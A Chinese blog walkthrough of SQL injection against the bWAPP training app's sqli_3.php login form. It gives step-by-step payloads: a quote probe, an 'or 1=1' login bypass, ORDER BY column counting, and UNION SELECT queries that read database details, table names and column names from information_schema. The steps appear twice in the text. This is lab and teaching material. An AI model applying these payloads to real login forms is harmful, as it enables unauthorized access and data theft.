SQL注入之bWAPP之sqli_3.php
2018-03-29 15:37
375 查看
1、首先在login框中输入一个单引号看看有什么结果,结果如图:
仔细一看,报错内容中的“AND”前有四个单引号,说明我们输入的一个单引号正好和代码前的单引号闭合了。
2、尝试构造万能密码,尝试输入
“login=1' or 1=1 --+
&password=
&form=submit”,好像不对,在尝试输入
“login=1' or 1=1 #+
&password=
&form=submit”,对了,结果如图:
3、判断字段数并查看显示位:
输入“login=1' order by 5 #+”,报“Error: Unknown column '5' in 'order clause'”,输入“login=1' order by 4 #+”,报“Invalid credentials!”,说明字段是4,结果如图:
输入“login=-1' union select 1,2,3,4 #+”,结果如图:
4、查看数据库等信息:
输入“login=-1' union select 1,database(),3,group_concat(version(),"||",user()) #+”,得知数据库名为Bwapp,结果如图:
5、查询表名:
输入“login=-1' union select 1,database(),3,table_name from information_schema.tables where table_schema='Bwapp' #+”,得知表名为Blog,结果如图:
6、查询字段名:
输入“login=-1' union select 1,database(),3,column_name from information_schema.columns where table_name='Blog' #+”,得知字段名为Id,结果如图:
7、查询字段内容:
输入“login=-1' union select 1,database(),3,id from Blog #+”,没有数据。
仔细一看,报错内容中的“AND”前有四个单引号,说明我们输入的一个单引号正好和代码前的单引号闭合了。
2、尝试构造万能密码,尝试输入
“login=1' or 1=1 --+
&password=
&form=submit”,好像不对,在尝试输入
“login=1' or 1=1 #+
&password=
&form=submit”,对了,结果如图:
3、判断字段数并查看显示位:
输入“login=1' order by 5 #+”,报“Error: Unknown column '5' in 'order clause'”,输入“login=1' order by 4 #+”,报“Invalid credentials!”,说明字段是4,结果如图:
输入“login=-1' union select 1,2,3,4 #+”,结果如图:
4、查看数据库等信息:
输入“login=-1' union select 1,database(),3,group_concat(version(),"||",user()) #+”,得知数据库名为Bwapp,结果如图:
5、查询表名:
输入“login=-1' union select 1,database(),3,table_name from information_schema.tables where table_schema='Bwapp' #+”,得知表名为Blog,结果如图:
6、查询字段名:
输入“login=-1' union select 1,database(),3,column_name from information_schema.columns where table_name='Blog' #+”,得知字段名为Id,结果如图:
7、查询字段内容:
输入“login=-1' union select 1,database(),3,id from Blog #+”,没有数据。
相关文章推荐
- SQL注入之bWAPP之sqli_10-1.php
- SQL注入之bWAPP之sqli_1.php
- SQL注入之bWAPP之sqli_11.php
- SQL注入之bWAPP之manual_interv.php
- SQL注入之bWAPP之sqli_2.php
- SQL注入之bWAPP之sqli_13.php
- SQL注入之bWAPP之sqli_16.php
- SQL注入之bWAPP之sqli_6.php
- PHP SQL防注入
- php SQL 防注入的一些经验
- PHP SQL 注入攻击的技术实现以及预防办法
- PHP+MySQL环境下的SQL手工注入教程
- PHP中实现表单变量的安全处理,防止SQL注入
- PHP简单代码防止SQL注入
- PHP+MySQL 网站 SQL 注入攻击测试用例
- php中addslashes函数与sql防注入
- PHP的SQL注入
- PHP防止SQL注入
- php 防止sql 注入的语句